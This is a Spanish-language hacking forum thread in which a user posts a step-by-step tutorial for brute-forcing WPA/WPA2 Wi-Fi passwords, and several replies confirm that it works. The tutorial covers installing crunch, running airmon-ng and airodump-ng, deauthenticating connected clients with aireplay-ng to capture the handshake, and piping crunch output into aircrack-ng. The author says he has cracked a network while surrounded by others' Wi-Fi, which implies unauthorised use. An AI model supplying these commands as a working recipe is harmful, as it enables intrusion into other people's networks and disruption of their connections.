Hacking wpa-wpa2 fuerza bruta

Iniciado por Blackfall, 26 Agosto 2013, 09:33 AM

0 Miembros y 1 Visitante están viendo este tema.

Blackfall

Bueno este es mi primer "aporte" (en realidad me base en algunos tutoriales que vi y uni segu me parecio mejor), asi que si cometo algun error espero me corrijan.

aqui dejo uno de los tut. que leí

http://www.miralapantalla.com/auditorias-backtrack-5-crackear-claves-wpawpa2-sin-diccionario/

Descifrar wpa-wpa2 sin diccionario con crunch

Yo se que hay muchos que estan aburridos de estar haciendo o descargando diccionarios para hacer el uso de "la fuerza bruta", aunque lo que <<en mi opinion>> eso no es fuerza bruta, si no una cosa de suerte, aqui les digo como hacer el uso de "la fuerza bruta" para descifrar una wpa-wpa2.

primero descargarse el crunch.

http://db.tt/sXflhAeR

después lo instalas (esto lo saque del tuto del link de arriba).

vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un terminal. Cuando se abra el terminal teclearemos:

tar -xvzf crunch-3.3.tgz

Entramos en el directorio donde se acaba de descomprimir escribiendo:

cd crunch-3.3

Vamos a la carpeta y abrimos el archivo MakeFile para donde pone (en gedit tecleando $ gedit Makefile):

val:    crunch.c @echo "Building valgrind compatible binary..."
$(CC) $(VCFLAGS) $(LFS) $? -o crunch


Cambiar la última línea por:

$(CC) $? $(VCFLAGS) $(LFS) -o crunch

Y en donde pone:

crunch: crunch.c
@echo "Building binary..."
$(CC) $(CFLAGS) $(LFS) $? -o $@


Cambiar la última línea por:

$(CC) $? $(CFLAGS) $(LFS) -o $@

Guardamos y nuevamente en el terminal escribiremos:

make install

Para copiarlo en el sbin haciendo así:

cp crunch /usr/sbin/

hasta ahi va la instalación de crunch....

Ahora viene lo bueno...

si de casualidad no tienes todas las herramientas (aircrack-ng) puedes descargarlas de aquí:

http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz

y aqui les dejo algo de como instalarlo:

http://www.bluegehena.com/2012/12/instalar-aircrack-ng-en-linux-mint-13.html


Volviendo al tema......

vamos a la terminal y corremos airmon-ng (como supongo que algunos ya saben jeje).

tecleamos airmon-ng y activamos modo monitor, en mi caso es:

airmon-ng start wlan0

luego, vamos a analizar las redes:

airodump-ng mon0

ahora se elige la red a crackear:

airodump-ng -w crack (cualquier nombre aqui) -c 6 (canal que utiliza la red) --bssid xx:xx:xx:xx:xx (mac de la red que estamos atacando) mon0 (interfaz utilizada)

Ok, hasta aquí igual al cracking de wep, ahora vamos a conseguir el handshake  ;-) que es un archivo que manda el ordenador con la contraseña al router para que este acepte la conexión. Podemos esperar a que un cliente se conecte, o si no, si hay algún cliente conectado, procederemos a su desautentificación para que se desconecte y al volverse a conectar capturemos su Handshake :

aireplay-ng -0 00 (00 es el numero de veces que queremos que se intente desautentificar, con 50 suele llegar) -a (mac del router) -c (mac del cliente que está conectado, aparece justo debajo de donde pone station) (interface que estamos usando).

aquí talves te pida que pongas el nombre de la red (a mi me paso jeje) asi que solo pones -e [NombreDeLaRed] y algunos otros problemas jeje  :silbar:

ahora al tener el handshake viene lo siguiente:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -

8 9 igual el numero de digitos de la pass y 0123456789 los digitos que utilizara para hacer las combinaciones.

aquí llega el ejemplo de la pag. que ví, lo que no dice es que puedes poner por ejemplo:

abcdefghixyz0123456789 y te mezclara las combinaciones con las letras!!
así es posible llegar a cualquier contraseña porque tecleara todas las combinaciones posibles.... el problema es cuando jejeje

aquí es donde se ve la verdadera fuerza bruta.

Porque si no se te ocurre cual contrseña puede ser, solo dejas esto correr hasta que salga, pero eso si, ¡¡tienes que ser paciente!! jajaja

Espero les sirva, la pregunta no es: ¿¿se puede crackear una wpa-wpa2 sin diccionario?? si no : ¿¿Cuanto se tarda?? jajaja muchas gracias, si cometí algun error me dicen por favor ^^'




x0bs

Excelente  ;D Lo acabo de probar con una red (con una pass facil, eso si, para que no tardara tanto) y funciona perfectamente, conocía la herramienta crunch pero no sabia que podía hacer eso con el aircrack xD

Gracias

Blackfall

Cita de: x0bs en 29 Agosto 2013, 07:57 AM
Excelente  ;D Lo acabo de probar con una red (con una pass facil, eso si, para que no tardara tanto) y funciona perfectamente, conocía la herramienta crunch pero no sabia que podía hacer eso con el aircrack xD

Gracias

jeje ok, de nada, yo en este mismo momento acabo de conseguir una, y se toma su tiempo, pero se llega a la meta, así ya no estas haciendo las listas o bajándotelas  y esperando que en esas listas este el pass, con crunch siento que se te hace más seguro conseguirlo, aunque se tarde jeje,, y este conviene más cuando igual que yo, estas rodeado de WIFIs con wpa-wpa2 jejeje y me agrada que te haya funcionado  ;D saludos.

Sh4k4

#3
Citara pregunta no es: ¿¿se puede crackear una wpa-wpa2 sin diccionario?? si no : ¿¿Cuanto se
tarda??
Mas bien es... ¿cuantas keys por segundo crackeas?... entre mas mas rapido, menos... tiempo. Todo se reduce al poder de tu PC en precesar mas keys.

Blackfall

Cita de: Sh4k4 en 30 Agosto 2013, 08:01 AM
Mas bien es... ¿cuantas keys por segundo crackeas?... entre mas mas rapido, menos... tiempo. Todo se reduce al poder de tu PC en precesar mas keys.

jeje apenas 1 mega, jajaja pero solo es la tarjeta de la laptop, quiero conseguir un Alfa Network AWUS036NHA pero ahi voy jaja a ver si me puedes recomendar otro mejor jejeje

x0bs

Cita de: miltonrodmar en  4 Septiembre 2013, 14:22 PM
Acá encontré otro método parecido

http://lasmejoreswebonline.blogspot.com/2013/09/descifrarclaveswifi.html

Es diferente, no es fuerza bruta sino una vulnerabilidad en el sistema de proteccion WPS, ademas no sirve con todos los routers/modems.

:laugh:

Blackfall

Cita de: x0bs en  4 Septiembre 2013, 18:21 PM
Es diferente, no es fuerza bruta sino una vulnerabilidad en el sistema de proteccion WPS, ademas no sirve con todos los routers/modems.

:laugh:

lo eliminaron?   :huh:

el_chavo

Holas.

Saben si el crunch viene instalado e el baktrack o wifislax.
gracias


x0bs

Cita de: el_chavo en  9 Septiembre 2013, 15:08 PM
Holas.

Saben si el crunch viene instalado e el baktrack o wifislax.
gracias

Creo que si, viene instalado en kali

Swain

#9
Estoy en Kali 1.0.4 y si lo tiene (asumo que 1.0.5 que salio hace poquito tambien lo debe tener)

P.D: maniana lo pruebo en la notebook y en la PC de escritorio y a ver si muestran la cantidad de contrasenias que puede probar por seg dependiendo de la maquina.

Imagino que debe ser bueno para hacer una pequenia prueba de una clave con numeros (a veces suelen ser numeros de documentos, telefonos, o fechas)
No me sigas.